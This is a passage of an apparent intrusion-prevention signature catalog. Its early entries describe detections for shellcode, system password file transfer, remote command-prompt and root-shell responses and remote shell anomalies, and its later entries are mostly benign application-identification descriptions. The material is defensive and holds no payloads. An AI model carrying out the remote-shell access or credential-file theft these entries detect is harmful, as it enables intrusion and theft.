Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-826-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-System-Password-File-Transfer

About this situation: Detected an attempt to transfer system password file
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: HTTP_System-File-Access
Description:
Back to top

Shared_SS-VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow

About this situation: Suspicious MP4 file detected.
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-150-2032
Vulnerability: VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow
Description:
Back to top

Shared_SS-Windows-Command-Prompt

About this situation: Detects Windows command prompt banner
Context: Any TCP Server Stream
Severity: 7
Tags: Windows, x86, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-487-5211
Vulnerability: Windows-Command-Prompt
Description:
Back to top

Shared_SS-x86-X41nop-Shellcode

About this situation: Shellcode x41 nop detected
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-x86-X90nop-Shellcode

About this situation: Shellcode x90 nop detected
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-XAR-Archive-Download

About this situation: XAR archive file download detected
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, XAR, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: XAR-Archive-File-Transfer
File-Type-Identification
Description:
Back to top

Shared_SSH-Server-Detected-In-Nonstandard-Port

About this situation: SSH Server-Detected-In Nonstandard Port
Context: Any TCP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SSH server, Any Operating System not specific, Generic SSH server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-320-4219
Description:
Back to top

Shared_System-Uid-Response-Detect

About this situation: Possible remote intrusion, system uid response detected
Context: Any TCP Server Stream
Severity: 6
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, UID Response Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Description:
Back to top

Shared_TCP-CS-Hamachi-VPN-Logon

About this situation: Hamachi VPN logon detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Hamachi, Any Operating System not specific, Tunneling Protocols, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-920-5242
Vulnerability: Hamachi-VPN-Usage
Description:
Back to top

Shared_TCP-CS-SOCKS4-Connection-Request

About this situation: SOCKS4 connection request detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols, TCP Client Traffic
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-322-4219
Vulnerability: SOCKS4-Protocol
Description:
Back to top

Shared_TCP-CS-SOCKS5-Connection-Request

About this situation: SOCKS5 connection request detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols, TCP Client Traffic
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: SOCKS5-Protocol
Description:
Back to top

Shared_Uid-Response-Detect

About this situation: Possible remote intrusion, uid response detected
Context: Any TCP Server Stream
Severity: 6
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, UID Response Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

Shared_Uid-Root-Response-Detect

About this situation: Possible remote root access
Context: Any TCP Server Stream
Severity: 6
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, UID Response Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description: There is a chance that this situation is a false positive. Attack Host: $([[$LN_SRC]]/ipv4) Target Host: $([[$LN_DST]]/ipv4) Target Port: $([[$LN_DPORT]])
Back to top

Shared_Windows-Oracle-Response-Detect

About this situation: Possible remote intrusion, oracle response detected
Context: Any TCP Server Stream
Severity: 6
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Description:
Back to top

Shared_Windows-Unicode-Volume-Response-Detect

About this situation: Possible remote intrusion, windows volume response detected
Context: Any TCP Server Stream
Severity: 6
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-123-2032
Last changed: sgpkg-ips-148-2032
Description:
Back to top

Shared_Windows-Unicode-Volume-Response-Detect-2

About this situation: Possible remote intrusion, windows volume response detected
Context: Any TCP Server Stream
Severity: 6
Tags: Windows, Any Hardware, Any Software, Windows not specific, Any Software not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-123-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Windows-Remote-Directory-Listing
Description:
Back to top

Shared_Windows-Volume-Response-Detect

About this situation: Possible remote intrusion, windows volume response detected
Context: Any TCP Server Stream
Severity: 6
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Description:
Back to top

Shared_Windows-Volume-Response-Detect-2

About this situation: Possible remote intrusion, windows volume response detected
Context: Any TCP Server Stream
Severity: 6
Tags: Windows, Any Hardware, Any Software, Windows not specific, Any Software not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Windows-Remote-Directory-Listing
Description:
Back to top

Shared_X86-ShellCode-Detect

About this situation: Possible X86 shellcode seen in a TCP connection
Context: Any TCP Client Stream
Severity: 3
Tags: Any Operating System, x86, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, TCP Client Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-612-5211
Description:
Back to top

ShareMethods

About this situation: Application ShareMethods detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShareMethods is a Web 2.0 document management and collaboration service with a focus on sales, marketing, and the extended selling network.
Back to top

Sharepoint

About this situation: Application Sharepoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SharePoint is about giving you and the people you work with a better way to get things done together. Browse through these scenarios to discover what SharePoint is and what's in it for you.
Back to top

Shareprice-App

About this situation: SharePrice App usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: SharePrice is a free android and ios app that provides the real-time streaming prices for the LSE , London Stock Exchange.
Back to top

Sharesale-Affiliate

About this situation: Application Sharesale-Affiliate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShareASale is an affiliate marketing network. Affiliates use ShareASale to find products to promote, and earn commission for referrals on those products. Affiliates use their own website, blogs, PPC campaigns, SEO campaigns, RSS and email, as well as a number of other means.
Back to top

ShareThis

About this situation: ShareThis usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-943-5242
Last changed: sgpkg-ips-943-5242
Description: ShareThis is a widget button which allows users to share content on multiple platforms.
Back to top

Sharethrough

About this situation: Application Sharethrough detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sharethrough is a software company that powers in-feed, native ads for premium publishers and brand marketers.
Back to top

ShareVault

About this situation: ShareVault usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: ShareVault provides services for secure document sharing during due diligence and other business critical processes.
Back to top

Sharewise

About this situation: Application Sharewise detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: sharewise offers a platform for everybody who is interested in the stock market. Private investors, regardless of their level of experience, can find at sharewise valuable and reliable information about the global market
Back to top

SharpCloud

About this situation: Application SharpCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SharpCloud is visual communication software for the Enterprise
Back to top

Sharpen

About this situation: Application Sharpen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sharpen is a cloud native contact center platform that enables customer experience teams to establish better customer relationships.
Back to top

SharpSpring

About this situation: Application SharpSpring detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SharpSpring is a provider of marketing automation software that helps businesses identify prospects and drive customers down the sales pipeline, with tools like lead scoring and drip emails.
Back to top

Shazam

About this situation: Shazam usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Shazam offers three types of applications; a free-to-try program simply called Shazam, their pay-to-play program called Shazam Encore, and their most recent addition called Shazam RED, launched in 2009. The service was expanded in September 2012 to enable users in the US to identify featured music, access cast information and get links to show information online, as well as adding social networking capabilities. Source: Wikipedia
Back to top

SHE-MIS

About this situation: Application SHE-MIS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SHE-MIS web-based software manages EHS data across any domestic and global corporation.
Back to top

SheerID

About this situation: Application SheerID detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SheerID is an B2B verification platform that verifies that eligible customers can redeem offers like student, military, and teacher discounts.
Back to top

Shein

About this situation: Shein usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Description: Shein is a Chinese fast fashion e-commerce platform.
Back to top

Shell-Shockers

About this situation: Shell Shockers usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1764-5242
Description: Shell Shockers is an egg-based multiplayer shooter game.
Back to top

Shell_Abnormal-Stderr-Port

About this situation: Shell (cmd) stderr port not in range 512-1023
Context: Shell (cmd) without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-371-4219
Description: A Shell (cmd) connection declares a port for the stderr (standard error) stream that is not in the range 512-1023, as specified by the Remote Shell documentation. Client is not fully following the protocol specification, which can mean that the client is not a real Shell (cmd) client program. Risk analysis: Risk level is fairly low.
Back to top

Shell_Stderr-Wrong-Direction

About this situation: Wrong data direction in Shell (cmd) stderr stream
Context: Shell (cmd) without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-371-4219
Description: A Shell (cmd) stderr (standard error) connection moved data from the remote shell client to the server, while data should be transferred in this connection only from the Shell (cmd) server to the client. It is possible that the Shell (cmd) client is not a real Shell (cmd) client program, and the connection is used to bypass the access control.
Back to top

SHERM

About this situation: Application SHERM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sherm is program with tasks and responsibilities tracking, documents proceeding, incidents and risk management, reporting, and auditing for OHS.
Back to top

Sherpa-Tools

About this situation: Application Sherpa-Tools detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FlashPanel, is a cloud management and security tool for Google Apps which offers more than 100 different administrator features, with functionality ranging from user management tools, to email monitoring and delegation, and Google Drive sharing policies.
Back to top

ShieldSquare

About this situation: ShieldSquare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1769-5242
Description: ShieldSquare seems to be a telemetry platform.
Back to top

Shifthub

About this situation: Application Shifthub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shifthub is an engagement communication platform for businesses that schedule their staff. Stop doing admin work focus on what matters.
Back to top

Shinebox

About this situation: Application Shinebox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shinebox is built to collect, organize, record, and assist with efficiently operating your business
Back to top

Shintentsushin

About this situation: Shintentsushin usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This site is a Japanese web mail service that allows users to send and receive e mails.
Back to top

ShinyStat

About this situation: ShinyStat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-602-5211
Description: ShinyStat is a web advertising and statistic collection service.
Back to top

ShipStation

About this situation: Application ShipStation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShipStation is a web-based software designed to help eCommerce retailers process, fulfill, and ship their orders from all the most popular marketplaces and shopping carts using all the top carriers.
Back to top

Shipwire

About this situation: Application Shipwire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shipwire is an eCommerce warehousing and order fulfillment company. Its outsourced fulfillment service includes software for managing inventory across warehouses.
Back to top

ShipWorks

About this situation: Application ShipWorks detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShipWorks provides shipping software for your online business. Create UPS shipping labels, print postage with Endicia and Stamps.com, send email notifications, and track shipments.
Back to top

Shockwave

About this situation: Shockwave usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Shodan

About this situation: Shodan usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Description: Shodan is a search engine that can be used to find appliances connected to the internet. The website can be accessed at www.shodan.io.
Back to top

Shoebox

About this situation: Application Shoebox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shoebox: unlimited photo backup that you can access from your computer or phone. Available for iPhone, iPad, Android, Mac and PC.
Back to top

Shoeboxed

About this situation: Shoeboxed usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Shoeboxed is the fast, painless way to digitize and archive receipts in a single, secure location. They turn receipts into extracted, human verified data that is categorized, organized, fully searchable and available anytime, anywhere.
Back to top

Shoora VPN

About this situation: Shoora VPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1769-5242
Description: Shoora VPN can be used to bypass network restrictions.
Back to top

ShootQ

About this situation: Application ShootQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShootQ is virtual studio manager. User can offer product and service packages, book clients online and send invoices all from one place.
Back to top

Shopathome

About this situation: ShopAtHome usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: ShopAtHome offers online coupons, grocery coupons, restaurant coupons and special offers from the worlds best known brands, which enables you to save money online and on everyday items.
Back to top

Shopboostr

About this situation: Application Shopboostr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopboostr is a technology provider specialized in the digital environment. It helps ecommerce retailers deliver a personalized user experience through the use of big data collection.
Back to top

ShopBuilder.ME

About this situation: Application ShopBuilder.ME detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopBuilder.ME provides platform for retailers to create e-commerce website.
Back to top

shopcloud

About this situation: Application shopcloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopcloud is an ecommerce solution and online store software for enterprises.
Back to top

Shopcreator-Transact-Elite

About this situation: Application Shopcreator-Transact-Elite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopcreator allows retailers to create a fully hosted ecommerce site quickly and easily online with no upfront fee and no fixed monthly charge.
Back to top

Shopdaddy

About this situation: Application Shopdaddy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopdaddy gives you a single screen to update your website instantly at anytime from anywhere as well as shopping cart functionality and more.
Back to top

ShopFactory

About this situation: Application ShopFactory detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopFactory provides eCommerce solution designed to help users sell online, build and manage online store.
Back to top

Shopify

About this situation: Application Shopify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopify is a cloud-based, multichannel commerce platform designed for businesses. Merchants can use the software to design, set up and manage stores across web, mobile, social media.
Back to top

ShopIntegrator

About this situation: Application ShopIntegrator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopIntegrator hosted shopping cart ecommerce add-ins copy and paste into a website to add in an online store in minutes, sell digital downloads, sell products, sell deliverable goods, sell personliased items.
Back to top

ShopKeep-POS

About this situation: Application ShopKeep-POS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopKeep POS is solution to manage inventory, customers, and facilitate transactions, all from an iPad.
Back to top

Shopp

About this situation: Application Shopp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopp is a WordPress plugin that adds a customizable shopping cart and store front to your website.
Back to top

ShopperTrak

About this situation: Application ShopperTrak detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopperTrak provides business intelligence tool makes it simple for everyone from corporate executives to store-level associates to access the data they need to excel.
Back to top

ShopperTrak-Insights

About this situation: Application ShopperTrak-Insights detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopperTrak Insights - web-based reporting for instant access to insights. Perform in-depth analysis, or simply want to understand key metrics at-a-glance, ShopperTrak flexible reporting platform delivers instant access to compelling, actionable insights.
Back to top

Shopping

About this situation: Sites that support the online purchase of consumer goods and services except: sexual materials, lingerie, swimwear, investments, medications, educational materials, computer software or hardware, alcohol, tobacco, travel, vehicles and parts, weapons.
Context: URL Application Context
Severity: 1
Tags: Shopping, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that support the online purchase of consumer goods and services except: sexual materials, lingerie, swimwear, investments, medications, educational materials, computer software or hardware, alcohol, tobacco, travel, vehicles and parts, weapons.
Back to top

Shopping-Carts-for-Websites

About this situation: Application Shopping-Carts-for-Websites detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopping cart solutions, that offer storefront, backend administration tools, and complete catalog
Back to top

Shoprocket

About this situation: Application Shoprocket detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shoprocket is an API based eCommerce platform, offering users a feature rich system, that integrates seamlessly into any existing website, blog or Facebook page with a single line of code.
Back to top

Shopseen

About this situation: Application Shopseen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopseen - way to post, promote, sync, and ship your products, everywhere you sell.Sell on Instagram and all your stores together - manage everything from one place.
Back to top

ShopSite

About this situation: Application ShopSite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopSite provides shopping cart software for small to medium-sized businesses with an intuitive interface.
Back to top

ShopSocially

About this situation: Application ShopSocially detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopSocially- is a social, referral and retention solution for marketers. Solutions include referral program, social login, customer loyalty, visual commerce and more.
Back to top

ShopVisible

About this situation: Application ShopVisible detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShopVisible combines a broad list of core and premium features that work in concert with cutting edge search optimization.
Back to top

Shopware

About this situation: Application Shopware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shopware is a web based eCommerce solution made to create more inspirational and emotionally appealing shopping environments.
Back to top

ShoreTel-Sky-Portal

About this situation: Application ShoreTel-Sky-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The ShoreTel Sky VoIP phone system replaces separate carriers and infrastructure with applications and services delivered through the Internet or private cloud connection. Reliability and business continuity are assured because of our redundant network architecture has automatic failover built in.
Back to top

Shortmail

About this situation: Shortmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-595-5211
Description: Shortmail is a free email service.
Back to top

ShortStack

About this situation: Application ShortStack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShortStack is a software platform companies use to build lead-generating marketing campaigns and landing pages including Facebook contests, sweepstakes, videos, custom forms and more for social, mobile and web.
Back to top

SHOUTcast

About this situation: SHOUTcast traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Media
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-793-5211
Description: SHOUTcast is a proprietary software for streaming media over the internet.
Back to top

Shoutlet

About this situation: Application Shoutlet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shoutlet Social CRM helps you to create, manage, and measure all of your social media marketing communication.
Back to top

ShoWare

About this situation: Application ShoWare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShoWare is the ticketing system that develop a fully integrated Facebook Ticketing Application allowing venues to sell tickets directly through their Facebook Fan pages.
Back to top

Showbie

About this situation: Application Showbie detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Showbie allow assign, collect and review student work in iPad classrooms.
Back to top

Showdocument

About this situation: ShowDocument usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-629-5211
Description: ShowDocument is an online web application that allows multiple users to conduct web meetings, upload, share and review documents from remote locations.Users can collaborate on and review documents in real time, with annotations and text being visible to all users and accessible for coediting.
Back to top

ShowingSuite

About this situation: Application ShowingSuite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Showing Suite is All-in-one real estate agent software suite, real estate agent tool to help you maximize your potential and sell more listings.
Back to top

Showmypc

About this situation: ShowMyPC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service provides remote computer access, desktop sharing, and screen sharing to all users.
Back to top

ShrinkTheWeb

About this situation: Application ShrinkTheWeb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShrinkTheWeb empowers webmasters to show website previews next to links.
Back to top

Shutter-Stock

About this situation: Application Shutter-Stock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shutterstock is a stock photography agency providing photographs, illustrations, vectors, videos and music to businesses and individuals.
Back to top

Shutterfly

About this situation: Shutterfly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

ShuttleCloud

About this situation: Application ShuttleCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ShuttleCloud provides data migration and analytics software.
Back to top

Sia

About this situation: Application Sia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SIA Group providing solutions in the areas of IT. SIA Group combines Consulting, Systems Integration and Managed Services in four specialized business areas
Back to top

Sidekick

About this situation: Application Sidekick detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
